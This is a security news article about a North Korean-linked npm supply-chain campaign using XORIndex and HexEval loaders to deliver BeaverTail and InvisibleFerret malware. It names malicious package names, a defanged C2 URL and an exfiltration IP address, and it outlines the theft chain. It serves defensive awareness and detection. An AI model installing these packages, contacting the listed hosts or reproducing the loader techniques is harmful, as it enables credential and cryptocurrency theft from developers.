A newly identified wave of malicious software supply chain activity linked to North Korea has infiltrated the popular JavaScript package ecosystem npm, targeting developers worldwide.
The campaign, uncovered by Socket’s Threat Research Team, centers around a stealthy new malware loader dubbed XORIndex and marks a dangerous evolution of previous attacks involving the HexEval Loader.
In total, 67 malicious npm packages were deployed, with 28 containing the XORIndex Loader and 39 tied to the ongoing HexEval campaign.
Combined, these packages have accumulated over 17,000 downloads, with 27 packages still active at the time of reporting.
The XORIndex Loader is named for its use of XOR-based string obfuscation and index-based code hiding, allowing it to evade conventional security scans.
Upon installation of a malicious npm package, such as the still-live eth-auditlog, vite-meta-plugin, or cronek, the loader performs host reconnaissance, collecting details such as:
The collected data is exfiltrated to a command-and-control (C2) endpoint such as https://log-writter[.]vercel[.]app/api/ipcheck, hosted on Vercel.
The malware then runs arbitrary JavaScript code returned by the C2 server, eval() activating a dangerous chain of execution that downloads and runs the second-stage malware known as BeaverTail.
Once executed, BeaverTail scans nearly 50 wallet and browser extension locations, collecting sensitive data related to cryptocurrencies.
It targets platforms including MetaMask, Phantom, TronLink, Solana CLI, and even macOS keychains. Data is compressed into an archive and sent to hardcoded exfiltration servers like http://144[.]217[.]86[.]88/uploads.
From there, BeaverTail attempts to fetch and inject a third-stage malware known as InvisibleFerret, which enables remote access, command execution, and long-term persistence on compromised systems, posing a particularly significant threat to developers and cryptocurrency users.
This attack is part of a wider North Korean espionage and theft campaign known as Contagious Interview, targeting developers, job seekers, and cryptocurrency holders.
Both the XORIndex and HexEval campaigns exhibit signs of rapid iteration, with threat actors employing rotating npm aliases, utilizing legitimate cloud infrastructure, and employing sophisticated obfuscation tactics.
Security teams are advised to monitor package installation behaviors and integrate tools such as the Socket GitHub App, CLI, and browser extension to detect suspicious dependencies before they reach production environments.
A complete list of compromised packages, npm aliases, and C2 infrastructure has been published by Socket to aid in threat detection and mitigation.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…